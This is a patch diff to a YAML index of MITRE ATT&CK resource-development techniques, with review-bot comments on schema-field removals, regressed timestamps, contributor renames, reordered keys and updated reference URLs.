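Review bot: `spec_version: '2.1'` is dropped here, and the same removal recurs in almost every technique block in this patch while x_mitre_attack_spec_version is raised to 3.2.0. In STIX 2.1 spec_version is a required property on every SDO, so any downstream consumer that loads these `technique` objects as STIX, or validates them against the ATT&CK spec, will stop validating; if the intent is that this YAML is no longer STIX-shaped, state that in the commit message or the generator documentation. Also confirm the removal is a deliberate generator change rather than a side effect of reading from a source bundle that happens to omit the field.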
@@ -89399,11 +90070,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -89416,7 +90086,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
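Review bot: the contributor rename from "Goldstein Menachem" to "Menachem Goldstein" is applied here and again in the T1584 and T1608.005 hunks below; since the same name appears in several x_mitre_contributors lists, run a search over the whole index for the old ordering so no technique block is left carrying the previous spelling, otherwise the two spellings will look like two different contributors to anyone aggregating the field.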
@@ -89451,22 +90121,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
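Review bot: the new final paragraph (registering a domain through Route53 from inside a compromised AWS account) describes activity inside the victim's own cloud tenancy, unlike the rest of this PRE-platform technique, yet no corresponding change to x_mitre_detection or x_mitre_data_sources for T1583.001 appears in this patch (the visible part of the data-sources hunk below still lists only Domain Name: Passive DNS and Domain Name: Domain Registration). Confirm that upstream left those fields unchanged rather than the generator having dropped an update. The blank lines inserted into the `|-` block scalar change the rendered description (they become paragraph breaks), which is presumably intended given the parallel "one-time, single use" edit to T1608.005 later in the patch; the new (Citation: Invictus IR DangerDev 2024) tag does have a matching external_references entry added in a later hunk, so that part is consistent.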
@@ -89487,7 +90160,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -89526,6 +90199,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -89581,7 +90258,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -89639,7 +90315,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -89719,7 +90394,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -89779,7 +90453,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -89801,7 +90474,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
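Review bot: the `modified` timestamp for T1588.001 moves backwards, from 2022-04-25T14:00:00.188Z to 2021-10-17T16:15:52.805Z, and the same regression appears for T1586, T1584.005, T1585.001, T1587.004, T1608.003 and T1584.002 in hunks below. The old value 2022-04-25T14:00:00.188Z is shared verbatim by several techniques in this file, which looks like a bulk re-stamp from an earlier import, so the earlier value may well be the authentic upstream timestamp; a regressing `modified` nevertheless breaks any consumer that uses it for change detection or last-writer-wins merging and should be called out in the commit message, together with which ATT&CK release the generator read these objects from.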
@@ -89820,42 +90493,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
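Review bot: for T1588.001 this hunk removes x_mitre_attack_spec_version: 2.1.0 together with spec_version and adds no replacement, whereas the reorganised blocks elsewhere in the patch (T1583.003, T1588.002) receive x_mitre_attack_spec_version: 3.2.0. Combined with the `modified` value going back to 2021 in the previous hunk, T1588.001 appears to have been regenerated from an older ATT&CK object that predates the attack_spec_version field, not from the same release as the 3.2.0 objects; the same pattern (both fields removed, nothing added) recurs for T1585.001, T1587.004 and T1608.003 below. Either regenerate every technique from one release or document why these objects lag. The remainder of the hunk is the T1583.003 block being removed for re-emission in a new key order, which the next hunk supplies.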
@@ -89864,22 +90505,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
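Review bot: nearly all of this hunk is key reordering for T1583.003: x_mitre_modified_by_ref is removed at one position and re-added with the same value, and the external_references are re-emitted in a different order with the same five entries, so the substantive changes are only the new x_mitre_deprecated: false, revoked: false and x_mitre_attack_spec_version: 3.2.0. A deterministic key order in the generator (sorted keys, or the upstream STIX order) would turn a fifty-line hunk into three lines. One check worth doing: the x_mitre_detection text in this block cites ThreatConnect Infrastructure Dec 2020, Mandiant SCANdalous Jul 2020 and Koczwara Beacon Hunting Sep 2021 by exact source_name, so confirm none of the re-emitted source_name values changed spelling during the reorder.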
@@ -89893,7 +90565,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -89980,11 +90652,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -90044,7 +90715,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -90086,7 +90756,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -90101,7 +90771,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -90192,11 +90861,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -90229,15 +90897,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
@@ -90321,7 +90990,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -90375,7 +91043,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -90426,36 +91093,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -90464,21 +91105,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
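Review bot: the Recorded Future Beacon 2019 reference changes URL from https://www.recordedfuture.com/identifying-cobalt-strike-servers/ to https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers with a refreshed retrieval date, which is a genuine content update that deserves a line in the commit message, since the rest of this hunk is the same key reordering already seen for T1583.003 (x_mitre_contributors, external_references and the type/id/created fields move without changing value). A later hunk for the T1588 parent removes a related entry, Recorded Future Beacon Certificates at https://www.recordedfuture.com/cobalt-strike-servers/, and its re-emission falls outside the visible diff; if that URL was likewise rewritten to the /blog/ path it should carry the same retrieval-date update.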
@@ -90524,17 +91191,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -90560,7 +91226,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -90592,8 +91258,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
@@ -90620,7 +91284,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -90644,8 +91308,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -90671,7 +91333,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -90705,8 +91367,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -90754,7 +91414,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -90770,7 +91430,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -90829,54 +91488,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
